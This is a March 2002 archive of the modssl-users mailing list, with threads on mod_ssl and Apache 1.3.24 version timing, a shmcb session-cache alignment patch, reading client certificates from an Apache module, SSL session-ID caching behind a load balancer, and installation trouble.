-------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 22:21:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA26777; Mon, 25 Mar 2002 22:20:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id WAA26721; Mon, 25 Mar 2002 22:19:50 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id BAA89BD2A; Mon, 25 Mar 2002 22:21:22 +0100 (CET) Date: Mon, 25 Mar 2002 22:21:22 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: mod_ssl for apache 1.3.24? Message-ID: <20020325212122.GD1549@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Mar 25, 2002 at 03:35:55PM -0500, Cliff Woolley wrote: > On Mon, 25 Mar 2002, Cliff Woolley wrote: > > > But if you're in a huge hurry and absolutely can't wait, you can use the > > --force parameter to mod_ssl's configure script. > > Just to be clear: this method is NOT recommended. If you can wait for the > next version, I strongly urge you to do so. [In other words, --force at > your own risk. :] > Usually there is a new version of mod_ssl within a week after apache is released - which IMHO means that it is worth to wait (especially since this release of Apache only fixes security on windoze). vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 00:03:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA03624; Tue, 26 Mar 2002 00:02:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from executor.cambridge.redhat.com id AAA03575; Tue, 26 Mar 2002 00:01:42 +0100 (MET) Received: from host181.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90]) by executor.cambridge.redhat.com (Postfix) with ESMTP id B46BAABB07; Mon, 25 Mar 2002 23:01:36 +0000 (GMT) Received: (from jorton@localhost) by host181.cambridge.redhat.com (8.11.6/8.11.0) id g2PN1Z527346; Mon, 25 Mar 2002 23:01:35 GMT X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f Date: Mon, 25 Mar 2002 23:01:35 +0000 From: Joe Orton To: "Ralf S. Engelschall" Cc: modssl-users@modssl.org Subject: [PATCH] outstanding shmcb fixes Message-ID: <20020325230135.A27278@redhat.com> Mail-Followup-To: "Ralf S. Engelschall" , modssl-users@modssl.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Orton X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Here are the outstanding shmcb changes which didn't make it into 2.8.7, extracted from Geoff's patch. These fix the remaining SIGBUS problem(s) on SPARC etc. --- pkg.sslmod/ssl_scache_shmcb.c.orig Fri Mar 30 11:00:34 2001 +++ pkg.sslmod/ssl_scache_shmcb.c Tue Jul 10 13:37:10 2001 @@ -262,13 +262,38 @@ memcpys can hardly make a dent on the massive memmove operations this cache technique avoids, nor the overheads of ASN en/decoding. */ static unsigned int shmcb_get_safe_uint(unsigned int *); -static void shmcb_set_safe_uint(unsigned int *, unsigned int); +static void shmcb_set_safe_uint_ex(unsigned char *, const unsigned char *); +#define shmcb_set_safe_uint(pdest, src) \ + do { \ + unsigned int tmp_uint = src; \ + shmcb_set_safe_uint_ex((unsigned char *)pdest, \ + (const unsigned char *)(&tmp_uint)); \ + } while(0) #if 0 /* Unused so far */ static unsigned long shmcb_get_safe_ulong(unsigned long *); -static void shmcb_set_safe_ulong(unsigned long *, unsigned long); +static void shmcb_set_safe_ulong_ex(unsigned char *, const unsigned char *); +#define shmcb_set_safe_ulong(pdest, src) \ + do { \ + unsigned long tmp_ulong = src; \ + shmcb_set_safe_ulong_ex((unsigned char *)pdest, \ + (const unsigned char *)(&tmp_ulong)); \ + } while(0) #endif static time_t shmcb_get_safe_time(time_t *); -static void shmcb_set_safe_time(time_t *, time_t); +static void shmcb_set_safe_time_ex(unsigned char *, const unsigned char *); +#define shmcb_set_safe_time(pdest, src) \ + do { \ + time_t tmp_time = src; \ + shmcb_set_safe_time_ex((unsigned char *)pdest, \ + (const unsigned char *)(&tmp_time)); \ + } while(0) + +/* This is necessary simply so that the size passed to memset() is not a + * compile-time constant, preventing the compiler from optimising it. */ +static void shmcb_safe_clear(void *ptr, size_t size) +{ + memset(ptr, 0, size); +} /* Underlying functions for session-caching */ static BOOL shmcb_init_memory(server_rec *, void *, unsigned int); @@ -306,61 +331,46 @@ static unsigned int shmcb_get_safe_uint(unsigned int *ptr) { - unsigned char *from; unsigned int ret; - - from = (unsigned char *)ptr; - memcpy(&ret, from, sizeof(unsigned int)); + shmcb_set_safe_uint_ex((unsigned char *)(&ret), + (const unsigned char *)ptr); return ret; } -static void shmcb_set_safe_uint(unsigned int *ptr, unsigned int val) +static void shmcb_set_safe_uint_ex(unsigned char *dest, + const unsigned char *src) { - unsigned char *to, *from; - - to = (unsigned char *)ptr; - from = (unsigned char *)(&val); - memcpy(to, from, sizeof(unsigned int)); + memcpy(dest, src, sizeof(unsigned int)); } #if 0 /* Unused so far */ static unsigned long shmcb_get_safe_ulong(unsigned long *ptr) { - unsigned char *from; unsigned long ret; - - from = (unsigned char *)ptr; - memcpy(&ret, from, sizeof(unsigned long)); + shmcb_set_safe_ulong_ex((unsigned char *)(&ret), + (const unsigned char *)ptr); return ret; } -static void shmcb_set_safe_ulong(unsigned long *ptr, unsigned long val) +static void shmcb_set_safe_ulong_ex(unsigned char *dest, + const unsigned char *src) { - unsigned char *to, *from; - - to = (unsigned char *)ptr; - from = (unsigned char *)(&val); - memcpy(to, from, sizeof(unsigned long)); + memcpy(dest, src, sizeof(unsigned long)); } #endif static time_t shmcb_get_safe_time(time_t * ptr) { - unsigned char *from; time_t ret; - - from = (unsigned char *)ptr; - memcpy(&ret, from, sizeof(time_t)); + shmcb_set_safe_time_ex((unsigned char *)(&ret), + (const unsigned char *)ptr); return ret; } -static void shmcb_set_safe_time(time_t * ptr, time_t val) +static void shmcb_set_safe_time_ex(unsigned char *dest, + const unsigned char *src) { - unsigned char *to, *from; - - to = (unsigned char *)ptr; - from = (unsigned char *)(&val); - memcpy(to, from, sizeof(time_t)); + memcpy(dest, src, sizeof(time_t)); } /* @@ -1176,7 +1186,7 @@ "internal error"); return FALSE; } - memset(idx, 0, sizeof(SHMCBIndex)); + shmcb_safe_clear(idx, sizeof(SHMCBIndex)); shmcb_set_safe_time(&(idx->expires), expiry_time); shmcb_set_safe_uint(&(idx->offset), new_offset); ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 03:49:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA18518; Tue, 26 Mar 2002 03:48:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ext-mail.valicert.com id DAA18464; Tue, 26 Mar 2002 03:47:40 +0100 (MET) Received: from CONVERSION-DAEMON by ext-mail.valicert.com (PMDF V5.2-33 #46613) id <0GTK009017ONOS@ext-mail.valicert.com> for modssl-users@modssl.org; Mon, 25 Mar 2002 18:46:00 -0800 (PST) Received: from polaris.valicert.com ([192.168.2.34]) by ext-mail.valicert.com (PMDF V5.2-33 #46613) with ESMTP id <0GTK009287ONNS@ext-mail.valicert.com> for modssl-users@modssl.org; Mon, 25 Mar 2002 18:45:59 -0800 (PST) Received: by polaris.valicert.com with Internet Mail Service (5.5.2653.19) id ; Mon, 25 Mar 2002 18:47:32 -0800 Content-return: allowed Date: Mon, 25 Mar 2002 18:47:26 -0800 From: Himanshu Soni Subject: SSL_CLIENT_CERT in the access check phase To: "'modssl-users@modssl.org'" Message-id: <613B3C619C9AD4118C4E00B0D03E7C3E0297EE97@polaris.valicert.com> MIME-version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Himanshu Soni X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I am writing a module for apache which relies on mod_ssl. This module provides certificate authentication in addition to functionality provided by mod_access. Basically, its a copy of mod_access with certificate validation functionality. I rely on SSL_CLIENT_CERT environment variable being set but my module fails to read this environment variable. I read somewhere in this email-list that SSL_CLIENT_CERT is not set until the fix-up state. Is that correct? and if so, is there a way to get the client cert by other means? Thanx a bunch for any help. Himanshu Soni ValiCert Inc. http://www.valicert.com Software Engineer phone: 650-567-5491 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 06:10:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA26993; Tue, 26 Mar 2002 06:09:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from UberGeek id GAA26967; Tue, 26 Mar 2002 06:09:13 +0100 (MET) Received: (qmail 8877 invoked by uid 500); 26 Mar 2002 05:09:02 -0000 Subject: Re: mod_ssl for apache 1.3.24? From: Austin Gonyou To: modssl-users@modssl.org In-Reply-To: <20020325212122.GD1549@marvin-lnx.int.tele.dk> References: <20020325212122.GD1549@marvin-lnx.int.tele.dk> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.3.99 Date: 25 Mar 2002 23:09:02 -0600 Message-Id: <1017119342.8777.23.camel@UberGeek> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Austin Gonyou X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 2002-03-25 at 15:21, Mads Toftum wrote: > Usually there is a new version of mod_ssl within a week after apache is > released - which IMHO means that it is worth to wait (especially since > this release of Apache only fixes security on windoze). Not true. For those using mod_rewrite, it's been broken in some instances in 1.3.23. I'd rather wait anyway, but you know, there is that. > > vh > > Mads Toftum -- Austin Gonyou Systems Architect, CCNA Coremetrics, Inc. Phone: 512-698-7250 email: austin@coremetrics.com "It is the part of a good shepherd to shear his flock, not to skin it." Latin Proverb ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 08:38:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA08568; Tue, 26 Mar 2002 08:37:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id IAA08496; Tue, 26 Mar 2002 08:36:14 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 0226ABD2A; Tue, 26 Mar 2002 08:37:47 +0100 (CET) Date: Tue, 26 Mar 2002 08:37:47 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL_CLIENT_CERT in the access check phase Message-ID: <20020326073747.GA3945@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <613B3C619C9AD4118C4E00B0D03E7C3E0297EE97@polaris.valicert.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <613B3C619C9AD4118C4E00B0D03E7C3E0297EE97@polaris.valicert.com> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Mar 25, 2002 at 06:47:26PM -0800, Himanshu Soni wrote: > Hi > > I am writing a module for apache which relies on mod_ssl. This module > provides certificate authentication in addition to functionality provided by > mod_access. > Basically, its a copy of mod_access with certificate validation > functionality. I rely on SSL_CLIENT_CERT environment variable being set but > my module fails to read this environment variable. > I read somewhere in this email-list that SSL_CLIENT_CERT is not set until > the fix-up state. > > Is that correct? and if so, is there a way to get the client cert by other > means? > I have an old, simple and sligthly b0rken example at http://www2.toftum.dk/apache/ It should at least give you a general idea about how to get at the relevant variables from an Apache module. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 09:10:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA10696; Tue, 26 Mar 2002 09:09:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls901a id JAA10669; Tue, 26 Mar 2002 09:08:58 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Tue, 26 Mar 2002 08:09:19 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF90B5@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: RE: SSL Session cache and IDs Date: Tue, 26 Mar 2002 08:09:15 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks all for the replies. I have done some experimenting with a SSLCachetimeout of 15s. Even though I can send a request within 15s with the same session id I get a status of request=GET status=MISSED id=... (session renewal) followed by request=SET status=OK id=.... timeout=15s (session caching) with a completely new id. The problem is that our content switch (Cisco) is going sticky on SSL ID and because the client has a new id it can do what it likes with it. Under load the switch could send the next request to a different machine. We are not sharing caches as SSL sessions should be on same machine. I can understand getting a new ID when the session is dead, i.e. request=REM status=OK id=.... (session dead) I have tried this with nokeepalive and without, no difference. My browsermatch statements are: BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 My SetEnvIf is SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown Regards Mike Bray SBS UK -----Original Message----- From: Cliff Woolley [mailto:jwoolley@apache.org] Sent: Monday, March 25, 2002 8:10 PM To: modssl-users@modssl.org Subject: Re: SSL Session cache and IDs On Mon, 25 Mar 2002, Mads Toftum wrote: > The defaults are nokeepalive IIRC - if that affects the session, then > shouldn't it cut the session short even after the initial request? nokeepalive doesn't really imply no session caching at all... that's not exactly what I meant to say. What I was trying to say was that IE doesn't deal well with sessions in general, which is why kept-alive sessions cause even more headaches -- IE just does bad things with them. I can't be much more specific than that because I haven't studied it in depth... but I just feel like things that would make IE behave better with sessions in general might make it do the right thing the server asks for a renegotation in this case. > Setting SSLLogLevel to something like debug and looking for cache > hits/misses would probably be a good place to start. This and testing with/without load balancing both sound like a good plan... --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 10:01:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA14095; Tue, 26 Mar 2002 10:00:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA13971; Tue, 26 Mar 2002 09:59:30 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA26619 for ; Tue, 26 Mar 2002 09:59:18 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma026590; Tue, 26 Mar 02 09:59:14 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA10870 for ; Tue, 26 Mar 2002 09:59:14 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA26155 for ; Tue, 26 Mar 2002 09:59:12 +0100 (MET) Message-ID: <3CA0385F.CB2B53C0@bourse.ch> Date: Tue, 26 Mar 2002 09:59:11 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: After Install: Apache working, modssl not References: <000601c1d426$2c39dd40$dbf42a18@cr2320296a> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Michael Connors wrote: > > I have followed the installation procedures exactly for SSL. This is what I > have configured in this order > 1) openssl 0.9.6.c > 2) mod_ssl 2.8.7 > 3) Apache 1.3.23 > onto a Linux Mandrake 8.0 (redhat) OS. I chose NOT to install MM Shared > Memory. > The whole configure and install worked without any errors and the 'make > certificate' went fine. > When I execute '/path/to/apache/bin/apachectl startssl I get this response > > apachectl startssl: httpd started > > When I check the open listening ports (443 and/or 8443) on this same > machine they are closed and the 8081 (cause my ISP blocks port 80) is open. > > And here is the error_log from apache logs after a start (apachectl > startssl) > > [Mon Mar 25 12:40:24 2002] [notice] Apache/1.3.23 (Unix) mod_ssl/2.8.7 > OpenSSL/0.9.6c configured -- resuming normal operations > [Mon Mar 25 12:40:24 2002] [notice] Accept mutex: sysvsem (Default: > sysvsem) > > What does this mean? Does anyone know what may be wrong? Starting with the obvious questions: Did you define an SSL virtual host (with SSLEngine on) and switch on port 443/8443 with a Listen directive? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 16:09:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA10993; Tue, 26 Mar 2002 16:08:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls901a id QAA10918; Tue, 26 Mar 2002 16:07:17 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Tue, 26 Mar 2002 15:07:37 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF90BE@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: RE: SSL Session cache and IDs Date: Tue, 26 Mar 2002 15:07:34 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Further investigation has resulted in an answer. See http://www.mail-archive.com/modssl-users@modssl.org/msg09443.html We are using a temporary certificate for testing and the address in the certificate does not match the address we are using for access to our test system. Thanks for the interest. Mike Bray -----Original Message----- From: Bray, Mike Sent: Tuesday, March 26, 2002 8:09 AM To: 'modssl-users@modssl.org' Subject: RE: SSL Session cache and IDs Thanks all for the replies. I have done some experimenting with a SSLCachetimeout of 15s. Even though I can send a request within 15s with the same session id I get a status of request=GET status=MISSED id=... (session renewal) followed by request=SET status=OK id=.... timeout=15s (session caching) with a completely new id. The problem is that our content switch (Cisco) is going sticky on SSL ID and because the client has a new id it can do what it likes with it. Under load the switch could send the next request to a different machine. We are not sharing caches as SSL sessions should be on same machine. I can understand getting a new ID when the session is dead, i.e. request=REM status=OK id=.... (session dead) I have tried this with nokeepalive and without, no difference. My browsermatch statements are: BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 My SetEnvIf is SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown Regards Mike Bray SBS UK -----Original Message----- From: Cliff Woolley [mailto:jwoolley@apache.org] Sent: Monday, March 25, 2002 8:10 PM To: modssl-users@modssl.org Subject: Re: SSL Session cache and IDs On Mon, 25 Mar 2002, Mads Toftum wrote: > The defaults are nokeepalive IIRC - if that affects the session, then > shouldn't it cut the session short even after the initial request? nokeepalive doesn't really imply no session caching at all... that's not exactly what I meant to say. What I was trying to say was that IE doesn't deal well with sessions in general, which is why kept-alive sessions cause even more headaches -- IE just does bad things with them. I can't be much more specific than that because I haven't studied it in depth... but I just feel like things that would make IE behave better with sessions in general might make it do the right thing the server asks for a renegotation in this case. > Setting SSLLogLevel to something like debug and looking for cache > hits/misses would probably be a good place to start. This and testing with/without load balancing both sound like a good plan... --Cliff -------------------------------------------------------------- Cliff Woolley cliffwoolley@yahoo.com Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 19:48:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA00675; Tue, 26 Mar 2002 19:47:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ext-mail.valicert.com id TAA00648; Tue, 26 Mar 2002 19:46:57 +0100 (MET) Received: from CONVERSION-DAEMON by ext-mail.valicert.com (PMDF V5.2-33 #46613) id <0GTL00E01G3BR5@ext-mail.valicert.com> for modssl-users@modssl.org; Tue, 26 Mar 2002 10:45:11 -0800 (PST) Received: from polaris.valicert.com ([192.168.2.34]) by ext-mail.valicert.com (PMDF V5.2-33 #46613) with ESMTP id <0GTL00EJWG3A7P@ext-mail.valicert.com> for modssl-users@modssl.org; Tue, 26 Mar 2002 10:45:11 -0800 (PST) Received: by polaris.valicert.com with Internet Mail Service (5.5.2653.19) id ; Tue, 26 Mar 2002 10:46:45 -0800 Content-return: allowed Date: Tue, 26 Mar 2002 10:46:42 -0800 From: Himanshu Soni Subject: RE: SSL_CLIENT_CERT in the access check phase To: "'modssl-users@modssl.org'" Message-id: <613B3C619C9AD4118C4E00B0D03E7C3E0297EE99@polaris.valicert.com> MIME-version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Himanshu Soni X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Thanx for the info. I see that you call ssl_var_lookup(..) which internally calls ap_table_get on the SSL_CLIENT_CERT_DN enviornment variable. When I compile my module with ssl_var_lookup(..), it fails during linking. This is because ssl_var_lookup(..) is not exported. How did you manage to resolve this symbol in your builds? Thanx Himanshu Soni -----Original Message----- From: Mads Toftum [mailto:mads@toftum.dk] Sent: Monday, March 25, 2002 11:38 PM To: modssl-users@modssl.org Subject: Re: SSL_CLIENT_CERT in the access check phase On Mon, Mar 25, 2002 at 06:47:26PM -0800, Himanshu Soni wrote: > Hi > > I am writing a module for apache which relies on mod_ssl. This module > provides certificate authentication in addition to functionality provided by > mod_access. > Basically, its a copy of mod_access with certificate validation > functionality. I rely on SSL_CLIENT_CERT environment variable being set but > my module fails to read this environment variable. > I read somewhere in this email-list that SSL_CLIENT_CERT is not set until > the fix-up state. > > Is that correct? and if so, is there a way to get the client cert by other > means? > I have an old, simple and sligthly b0rken example at http://www2.toftum.dk/apache/ It should at least give you a general idea about how to get at the relevant variables from an Apache module. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 20:41:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA05144; Tue, 26 Mar 2002 20:40:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id UAA05061; Tue, 26 Mar 2002 20:39:26 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 1ECBBBD2A; Tue, 26 Mar 2002 20:40:55 +0100 (CET) Date: Tue, 26 Mar 2002 20:40:55 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL_CLIENT_CERT in the access check phase Message-ID: <20020326194055.GA6635@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <613B3C619C9AD4118C4E00B0D03E7C3E0297EE99@polaris.valicert.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <613B3C619C9AD4118C4E00B0D03E7C3E0297EE99@polaris.valicert.com> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Mar 26, 2002 at 10:46:42AM -0800, Himanshu Soni wrote: > Hi > > Thanx for the info. > I see that you call ssl_var_lookup(..) which internally calls ap_table_get > on the SSL_CLIENT_CERT_DN enviornment variable. > When I compile my module with ssl_var_lookup(..), it fails during linking. > This is because ssl_var_lookup(..) is not exported. > > How did you manage to resolve this symbol in your builds? > I don't remember doing anything special - except what you see in the module/ makefile. IIRC I just looked at the code in mod_ssl and found the appropriate function by looking at what was being used elsewhere. The module is close to two years old and I haven't used it much lately, so YMMV. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 20:53:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA06046; Tue, 26 Mar 2002 20:52:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA05969; Tue, 26 Mar 2002 20:51:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 090794CE695; Tue, 26 Mar 2002 20:51:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2QJfjd52141; Tue, 26 Mar 2002 20:41:45 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from posmail2.posl.com id NAA28299; Tue, 26 Mar 2002 13:22:16 +0100 (MET) Received: from dov11mail.poits.net (unverified) by posmail2.posl.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Tue, 26 Mar 2002 12:27:30 +0000 Received: by DOV11MAIL.dover.poits.net with Internet Mail Service (5.5.2653.19) id ; Tue, 26 Mar 2002 12:25:50 -0000 Message-ID: From: "Kingsland, Haden" To: "'modssl-users@modssl.org'" Subject: A Question ... Date: Tue, 26 Mar 2002 12:25:24 -0000 X-Mailer: Internet Mail Service (5.5.2653.19) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kingsland, Haden" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users * This electronic document (comprising text and any attachments) * is confidential and intended solely for the use of the individual * or entity to whom it is addressed. * * If you have received this document in error please notify the * System Manager . ********************************************************************** Good Afternoon, I have recently downloaded the appropriate mod_ssl*tar.gz file for my version of Apache as well as the associated latest version of the open_ssl*tar.gz libraries. I now need to 'unpack' these files in order to be able to create the mod_ssl loadable module. Can anyone help. I am using Apache within Microsoft Windows NT. Thankyou in advance for your help. Regards .... Haden. Haden Kingsland P&O Stena Line Technical Support Analyst ********************************************************************** * P&O Stena Line Ltd disclaims all legal responsibility for the * accuracy or otherwise of any information contained within this * electronic document (comprising text and any attachments). * * Any view expressed about individuals or other companies is that * of the originator of the document and in no way represents the * corporate view of P&O Stena Line Ltd. * * This footnote also confirms that the document has been swept * by MIMEsweeper for the presence of computer viruses. * * ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 26 22:52:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16223; Tue, 26 Mar 2002 22:51:22 +0100 